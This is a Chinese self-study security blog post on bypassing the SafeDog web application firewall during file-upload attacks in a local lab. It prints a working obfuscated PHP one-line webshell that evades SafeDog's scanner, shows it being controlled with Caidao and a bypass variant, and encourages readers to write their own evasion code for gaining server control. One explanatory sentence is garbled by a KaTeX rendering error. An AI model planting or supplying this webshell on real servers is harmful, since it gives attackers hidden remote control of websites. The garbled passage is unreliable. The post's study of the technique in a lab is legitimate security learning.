[网络安全自学篇] 三十三.文件上传漏洞之绕狗一句话原理和绕过安全狗(六)

这是做者的系列网络安全自学教程,主要是关于安全工具和实践操做的在线笔记,特分享出来与博友们学习,但愿您们喜欢,一块儿进步。前文详细讲解了Upload-labs靶场及文件上传漏洞20道CTF题目,并结合Caidao工具介绍拿站的流程及防护原理。本篇文章将介绍绕狗一句话原理、绕过安全狗的经常使用方法和过狗菜刀,并实践安装安全狗进行实际测试。这是文件上传漏洞系列的最后一篇博客,不知道有没有帮助到你们。但愿博友们必定要去试试Upload-labs靶场的20道题目。php

做者做为网络安全的小白,分享一些自学基础教程给你们,但愿您们喜欢。同时,更但愿您能与我一块儿操做和进步,后续将深刻学习网络安全和系统安全知识并分享相关实验。总之,但愿该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!若是文章对您有帮助,将是我创做的最大动力。html

PS:本文参考了B站、51CTO学院(Fox老师)和参考文献中的文章,并结合本身的经验进行撰写,也推荐你们阅读参考文献。git

下载地址:https://github.com/eastmountyxz/NetworkSecuritySelf-study
资源下载地址:github

前文学习:
[网络安全自学篇] 一.入门笔记之看雪Web安全学习及异或解密示例
[网络安全自学篇] 二.Chrome浏览器保留密码功能渗透解析及登陆加密入门笔记
[网络安全自学篇] 三.Burp Suite工具安装配置、Proxy基础用法及暴库示例
[网络安全自学篇] 四.实验吧CTF实战之WEB渗透和隐写术解密
[网络安全自学篇] 五.IDA Pro反汇编工具初识及逆向工程解密实战
[网络安全自学篇] 六.OllyDbg动态分析工具基础用法及Crakeme逆向破解
[网络安全自学篇] 七.快手视频下载之Chrome浏览器Network分析及Python爬虫探讨
[网络安全自学篇] 八.Web漏洞及端口扫描之Nmap、ThreatScan和DirBuster工具
[网络安全自学篇] 九.社会工程学之基础概念、IP获取、IP物理定位、文件属性
[网络安全自学篇] 十.论文之基于机器学习算法的主机恶意代码
[网络安全自学篇] 十一.虚拟机VMware+Kali安装入门及Sqlmap基本用法
[网络安全自学篇] 十二.Wireshark安装入门及抓取网站用户名密码(一)
[网络安全自学篇] 十三.Wireshark抓包原理(ARP劫持、MAC泛洪)及数据流追踪和图像抓取(二)
[网络安全自学篇] 十四.Python攻防之基础常识、正则表达式、Web编程和套接字通讯(一)
[网络安全自学篇] 十五.Python攻防之多线程、C段扫描和数据库编程(二)
[网络安全自学篇] 十六.Python攻防之弱口令、自定义字典生成及网站暴库防御
[网络安全自学篇] 十七.Python攻防之构建Web目录扫描器及ip代理池(四)
[网络安全自学篇] 十八.XSS跨站脚本攻击原理及代码攻防演示(一)
[网络安全自学篇] 十九.Powershell基础入门及常见用法(一)
[网络安全自学篇] 二十.Powershell基础入门及常见用法(二)
[网络安全自学篇] 二十一.GeekPwn极客大赛之安全攻防技术总结及ShowTime
[网络安全自学篇] 二十二.Web渗透之网站信息、域名信息、端口信息、敏感信息及指纹信息收集
[网络安全自学篇] 二十三.基于机器学习的恶意请求识别及安全领域中的机器学习
[网络安全自学篇] 二十四.基于机器学习的恶意代码识别及人工智能中的恶意代码检测
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防护初探
[网络安全自学篇] 二十六.Shodan搜索引擎详解及Python命令行调用
[网络安全自学篇] 二十七.Sqlmap基础用法、CTF实战及请求参数设置(一)
[网络安全自学篇] 二十八.文件上传漏洞和Caidao入门及防护原理(一)
[网络安全自学篇] 二十九.文件上传漏洞和IIS6.0解析漏洞及防护原理(二)
[网络安全自学篇] 三十.文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防护(三)
[网络安全自学篇] 三十一.文件上传漏洞之Upload-labs靶场及CTF题目01-10(四)
[网络安全自学篇] 三十二.文件上传漏洞之Upload-labs靶场及CTF题目11-20(五)web

前文欣赏:
[渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
[渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
[渗透&攻防] 三.数据库之差别备份及Caidao利器
[渗透&攻防] 四.详解MySQL数据库攻防及Fiddler神器分析数据包正则表达式

该篇文章参考了如下文献,很是推荐你们阅读这些大牛的文章和视频:
https://github.com/eastmountyxz
《Web安全深度剖析》《黑客攻防技术宝典浏览器实战篇》
https://www.bilibili.com/video/av60018118 (B站白帽黑客教程)
2019/Web安全/漏洞挖掘/信息收集/SQLMAP/SSRF/文件上传/逻辑漏洞 (B站强推)
2019文件上传漏洞专题渗透入门网络安全黑客web攻防详解 (Fox B站强推)
https://github.com/c0ny1/upload-labs
百度百科 - 安全狗
http://www.safedog.cn/index/publicCloudIndex.html算法

声明:本人坚定反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络须要咱们共同维护,更推荐你们了解它们背后的原理,更好地进行防御。shell


一.防火墙及安全狗

防火墙技术是经过有机结合各种用于安全管理与筛选的软件和硬件设备,帮助计算机网络于其内、外网之间构建一道相对隔绝的保护屏障,以保护用户资料与信息安全性的一种技术。数据库

防火墙技术的功能主要在于及时发现并处理计算机网络运行时可能存在的安全风险、数据传输等问题,其中处理措施包括隔离与保护,同时可对计算机网络安全当中的各项操做实施记录与检测,以确保计算机网络运行的安全性,保障用户资料与信息的完整性,为用户提供更好、更安全的计算机网络使用体验。编程

在这里插入图片描述

假设咱们的phpStudy靶场存在一个“a.php”文件,以下图所示,它是一个常规的木马。

在这里插入图片描述

咱们尝试访问“a.php”,但提示错误,由于它被防火墙或安全狗拦截了。

在这里插入图片描述


下面咱们再分享下安全狗的概念。
安全狗以SECaaS安全即为用户提供一站式的云安全产品与服务,包括(云)主机安全、WEB应用安全、网站防篡改、抗DDoS云服务、安全大数据态势感知等。其基本功能包括:

  • 网站安全狗: 面向网站安全,包括网马扫描及查杀(自有引擎,只针对网页木马);网马主动防护功能(可主动拦截网立刻传和访问的动做);防SQL注入功能、防XSS跨站攻击功能;防盗链防下载;以及防止CC攻击。
  • 服务器安全狗: 面向服务器安全的,包括基于内核驱动的抗DDOS攻击、抗ARP攻击、抗WEB CC攻击功能;基于内核驱动的文件系统主动保护功能(可防止文件被篡改、保护系统文件);基于内核驱动的服务器其余方面的主动防护功能(系统帐号、注册表、远程登录等方面的保护);以及服务器全面优化及体检功能。
  • 安全狗服云: 基于云端的监控和保护。安全狗服云利用云计算技术,为用户构造一个全面的服务器和网站的监控和防御平台,利用这个平台,用户能够作到24小时的服务器健康监控、资源监控和资源告警;24小时的服务器可用性监控;网站安全云扫描,发现网站存在的各类漏洞;基于云端技术的网站防篡改功能,保障网站文件不被非法修改。

在这里插入图片描述

接着咱们下载安全狗并进行安装,以下图所示。

在这里插入图片描述

安装成功以后,包括网站防御、资源防御、IP黑白名单、防御日志四个核心功能。

在这里插入图片描述

在这里插入图片描述


二.绕狗一句话

假设咱们存在一个“a.php”文件和“gou.php”文件。

在这里插入图片描述

其中“a.php”一句话木马以下图所示:

在这里插入图片描述

“gou.php”的代码以下:

在这里插入图片描述

<?php
	$a='b';
	$$a='assert';
	$b($_POST[fox]);
?>

点击网马查杀下面的“自定义路径扫描”按钮,以下图所示。

在这里插入图片描述

接着选择指定目录,这里使咱们phpStudy的靶场“WWW/gou”文件夹。

在这里插入图片描述

其扫描结果是,它发现了咱们的PHP一句话木马,却没有发现绕狗一句话。

在这里插入图片描述

木马提示以下图所示:

在这里插入图片描述

咱们的“dog.php”没有被发现了,而且可以直接访问,接下来咱们利用中国菜刀和狗刀进行链接,并解释其工做原理。

在这里插入图片描述


三.绕狗一句话原理

绕狗一句话木马代码以下:

<?php
	$a='b';
	$$a='assert';
	$b($_POST[fox]);
?>

这里的“$$a=‘assert’;”其实就是“$b”,因为没有直接对“KaTeX parse error: Undefined control sequence: \b at position 1: \̲b̲”进行赋值,因此安全狗不会提示…_POST[fox])”,其实就是一句话木马。紧接着咱们尝试用Caidao进行链接。

注意,这里这里咱们远程服务器上传的绕狗一句话文件叫“dog.php”。

在这里插入图片描述

这里提示安全狗拦截,以下图所示:

在这里插入图片描述

下图能够看到,中国菜刀成功获取了服务器的文件目录。

在这里插入图片描述

接着尝试用狗刀进行链接。

在这里插入图片描述

链接的URL以下所示,密码为“fox”(fox老师的名称)。

在这里插入图片描述

最终也成功获取了服务器的目录。

在这里插入图片描述

接着尝试利用WSExplorer工具进行抓包,对比“中国菜刀”和“狗刀”的流量。

在这里插入图片描述
在这里插入图片描述

将数据包复制到记事本中,进行对比,上面是“中国菜刀”获取的数据包,下面是“狗刀”获取的数据包。

在这里插入图片描述

将z0和z1提取出来,以下图所示,一般会搜索%而后转换“=”、“+”等字符。

在这里插入图片描述

从Cracer安全工具中找到转码工具。

在这里插入图片描述

Base64转码的结果以下图所示:

在这里插入图片描述

“中国菜刀”流量的转码结果以下:

在这里插入图片描述

“狗刀”流量的转码结果以下:

在这里插入图片描述

两段流量不一样的地方以下:
在这里插入图片描述

这里建议尝试本身去抓包分析下过狗菜刀的原理,而后编写属于本身的代码。经过过狗成功绕过并控制了整个C盘,对于咱们提权有很大的帮助。

在这里插入图片描述


四.总结

写到这里,这篇基础性文章就此结束,最后但愿这篇基础性文章对您有所帮助。忽然发现,做者已经写了400篇文章了,很是值得记念,从此也但愿帮到更多的读者。也以为本身的技术好浅,要学的知识好多,但愿读博四年能不断成长吧。最后祝明天全部考研学子都取得好成绩,不负青春~

(By:Eastmount 2019-12-20 晚上10点写于武大 http://blog.csdn.net/eastmount/ )